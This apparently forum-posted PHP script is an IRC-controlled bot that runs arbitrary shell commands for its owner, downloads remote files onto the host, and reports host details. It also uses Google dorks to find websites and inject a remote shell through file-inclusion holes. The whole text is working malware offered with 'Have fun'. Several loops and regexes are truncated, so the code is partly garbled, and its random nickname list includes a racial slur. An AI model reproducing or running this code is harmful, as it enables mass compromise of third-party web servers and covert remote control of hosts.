$network = ""; // irc network address //$port = 6667; // irc network port //$channel = ""; // irc channel //$channel_password = ""; // irc channel password //$owner = ""; // owners nickname //$owner_password = ""; // login password (MD5 Encoded) //$trigger = "."; // bot trigger //$max_results = 150; // maximum Google results ////End config//////////////////////////////////////////////////////////////@set_time_limit(0);function randName(){$nickparts = Array("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee", "sm4ck", "nigr", "sTench");$tmp = "";for($i=0;$i$tmp = $nickparts[mt_rand(0, count($nickparts)-1)] . mt_rand(1000,9999);}return $tmp;}$sck = fsockopen($network, $port, $errno, $errstr) or die("Connection error: " . $errstr);function send($msg, $to){global $sck, $nick;fputs($sck, "PRIVMSG " . $to . " " . $msg . "");}function pong(){global $sck;$dat = @fgets($sck, 1024);$d = explode(" ", $dat);if($d[0] == "PING"){fputs($sck, "PONG " . $d[1]);}$dat = "";}function get_exec_function(){$exec_functions = array("popen", "exec", "shell_exec");$disabled_funcs = ini_get(disable_functions);foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f;}function execute_command($exec_function, $command, $to){if(!$exec_function){send("No execution functions...", $to);}switch($exec_function){case "popen": $h = popen($command, "r"); while(!feof($h)) send(fgets($h), $to); break;case "exec": exec($command, $result); foreach($result as $r) send($r, $to); break;case "shell_exec": send(shell_exec($command), $to); break;}}function get($url, $out, $to){if(!$o = fopen($out, "w"))send("Unable to write file", $to);else{if(!$c = file_get_contents($url))send("Unable to open remote file", $to);else{if(!fwrite($o, $c))send("Unable to save file", $to); else{send("File saved", $to);fclose($o);}}}}function encodeDork($s){$tmp = "";for($i=0;$i$tmp .= "" . hexdec(bin2hex($s[$i])) . ";";}return urlencode($tmp);}function shellInject($url, $bug, $shell, $search){$url = explode("/", $url);$url = $url[2];$url = (strpos($url, "www") !== false ? "http://" . $url : "http://www." . $url) . $bug . $shell . "??";$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 4);$ret = curl_exec($ch);$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);curl_close($ch);if($httpcode == 200){if(strpos($ret, $search) !== false){return $url;}}return false;}function scan($dork, $bug, $shell, $search, $to){global $max_results;if(function_exists(curl_init)){$ch = curl_init("http://www.google.com/search?q=" . encodeDork($dork) . "&start=0");curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);$ret = curl_exec($ch);curl_close($ch);preg_match_all("/of( about)* ([d,]+)/", $ret, $max);$max = str_replace(",", "", $max[2][0]);$max = $max > $max_results ? $max_results : $max;$i = 0;while($i $ch = curl_init("http://www.google.com/search?q=" . encodeDork($dork) . "&start=" . $i);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);$ret = curl_exec($ch);preg_match_all("/.*?/", $ret, $links);if(@$links[1]){foreach($links[1] as $l){$ret = shellInject($l, $bug, $shell, $search);if($ret != false){send("[+] Shell found: " . $ret, $to);}}}else{send("No sites found", $to);}curl_close($ch);$i = $max>10 ? $i+=10 : $i++;send("$i scanned", $to);pong();}}else{send("cURL is not enabled", $to);}}$nick = randName();sleep(1);fputs($sck, "USER " . $nick . " ? * " . $nick . "@hotmail.com");sleep(1);fputs($sck, "NICK " . $nick . "");$loggedin = false;while(!feof($sck)){$dat = fgets($sck, 4096);$d = explode(" ", $dat);preg_match_all("/:(.+)!(.+) PRIVMSG (.+) :$trigger(w+)s*(.+)*/", $dat, $cmd);if($d[0] == "PING"){fputs($sck, "PONG " . $d[1]);}if(strpos($dat, "HELP REGISTER") !== false){fputs($sck, "JOIN " . $channel . " " . $channel_password . "");}if(preg_match("/:(.+)!.+ PRIVMSG .+ :.VERSION(.)/", $dat, $v)){fputs($sck, "NOTICE " . $v[1] . " " . $v[2] . "VERSION mIRC v6.3 Khaled Mardam-Bey" . $v[2] . "");}if(@$cmd[4][0]){$from = $cmd[1][0];$from_host = $cmd[2][0];$to = $cmd[3][0] == $nick ? $cmd[1][0] : $cmd[3][0];$command = $cmd[4][0];$args = $cmd[5][0];if($from == $owner && $loggedin == true){switch($command){case "cmd": execute_command(get_exec_function(), $args, $to); break;case "die": fputs($sck, "QUIT :Received die from " . $from); die();case "get": $a = explode(" ", $args); get($a[0], $a[1], $to); break;case "inf": send("Host: " . $_SERVER[HTTP_HOST] . "Whoami: " . @exec(whoami), $to); break;case "raw": fputs($sck, $args . ""); break;case "rfi": $a = explode(" ", $args); if(count($a) > 3){send("Beginning RFI scan", $to); scan($a[0], $a[1], $a[2], $a[3], $to); send("RFI scan complete", $to);}else send("Usage: (dork) (bug) (shell) (search)", $to);break;case "say": send($args, $to); break;default: send("Unknown command.", $to);}}elseif($from == $owner && $loggedin == false){if($command == "login"){if(md5($args) == $owner_password){$loggedin = true;send("User $from successfully logged in.", $to);}else{send("Login failed.", $to);}}}} $dat = "";}?>credits flyZ to: Array("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee", "sm4ck", "nigr", "sTench");Have fun. =) 09-11 04:48